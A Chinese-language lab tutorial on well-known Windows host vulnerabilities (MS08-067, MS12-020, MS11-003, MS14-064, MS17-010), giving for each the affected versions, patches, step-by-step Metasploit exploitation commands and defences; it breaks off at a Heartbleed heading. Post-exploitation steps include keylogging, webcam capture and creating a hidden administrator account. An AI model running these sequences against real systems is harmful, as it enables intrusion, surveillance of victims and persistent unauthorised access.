网络安全中常见的主机漏洞
常见主机漏洞
1.MS08_067
- 利用端口:445
类型:缓冲区溢出漏洞、远程任意指令执行漏洞RCE
范围:win2000、xp、server 2003、vista、server 2008、7 Beta
补丁:KB958644
描述:如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 - 操作步骤:
环境:kali xp英文版
利用工具 metasploit
命令:
msfconsole
search ms08_067
use 0
show options
set rhosts xp'ip
show target 34(7)
show payloads
set payload 44
run/exploit
- 实验补充:
webcam_stream 打开摄像头返回视频流
webcam_snap 打开摄像头返回照片
ps 展示当前运行的进程信息
migrate [pig 号] 切换进程
keyscan_start 开始键盘监听
keyscan_dump 打印监听到的内容
keyscan_stop 结束键盘监听
shell 进入到windows命令行下 whoami 查看当前账户是谁
dir 查看文件
net user hacker 123456/add
net localgroup administrators hacker /add
rdesktop xp'ip 打开远程桌面登陆xp
- 防御
方法1:安装补丁
方法2:防火墙关闭445端口
2.MS12_020
- 利用端口:3389(RDP协议)
类型:缓冲区溢出漏洞、远程任意指令执行漏洞RCE、拒绝服务漏洞
范围:xp、server 2003、vista、server 2008
补丁:KB2621440
描述:如果攻击者向受影响的系统发送一系列特制 RDP 数据包,则这些漏洞中较严重的漏洞可能允许远程执行代码,或造成系统拒绝服务。 - 操作步骤
实验环境 kali、win2003
利用工具:metasploit
命令:
msfconsole
search ms12_020
use 1
show options
set rhosts win2003'ip /24
run/exploit
search ms12_020
use 0
show options
set rhosts win2003'ip
run/exploit
- 防御
方法1:安装补丁
方法2:防火墙关闭3389端口
3.MS11_003
- 利用协议:HTTP协议
漏洞类型:缓冲区溢出漏洞、远程任意指令执行漏洞(RCE)
影响范围: IE6、IE7、IE8
微软安全公告:KB2482017
漏洞描述:
这些漏洞可在用户使用 Internet Explorer 查看特制 Web 页面或者用户打开一个加载特制库文件的合法 HTML 文件时允许远程执行代码。 - 操作步骤
环境:kali win7
工具:metasploit - 命令:
- msfconsole
search ms11_003
use 0
show options
set srvhost kali'ip
show options
set uripath a
exploit/run
sessions
sessions 1
shell
whoami
-
防御
方法1:安装补丁
方法2 : 使用其他浏览器的最新版本
4.MS14_064
- 利用协议:HTTP协议
漏洞类型:缓冲区溢出漏洞、远程任意指令执行漏洞(RCE)
影响范围: windows2003、2008、2012、vista、win7、win8
微软安全公告:KB3010788
漏洞描述:
OLE即对象连接与嵌入技术。OLE不仅是桌面应用程序集成,而且还定义和实现了一种允许应用程序作为软件“对象”彼此进行“连接”的机制。Microsoft Windows处理特制OLE对象文件的方式中存在远程代码执行漏洞,成功利用后可允许攻击者以当前用户权限执行任意代码。 - 操作步骤
环境kali win7
工具 metasploit
命令:
msfconsole
search ms14_064
use 0
show options
show payloads
set payload 50
show options
set AllowPowershellPrompt true
show options
show targets
set target 1
show options
run
sessions
sessions 1
shell
whoami
- 防御
方法1:安装补丁
方法2 : 不使用IE系列浏览器
5.MS17_010
- 利用协议:SMB
漏洞类型:缓冲区溢出漏洞、远程任意指令执行漏洞(RCE)
影响范围: windows2003、2008、2012、2016、vista、win7、win8、win10(1511/1607版)
微软安全公告:KB4012598、KB4012212、KB4012215
漏洞描述:
如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。 - 操作步骤
环境kali win7
工具 metasploit
命令:
msfconsole
search ms17_010
use 1
show options
set rhosts win7' ip
run
search
use 2
set rhosts win'ip
run
net user hacker 123 /add
net localgroup administrators hacker /add
ctrl+c
rdesktop [win7的ip]
- 防御:
安装补丁
6.heartbleed漏洞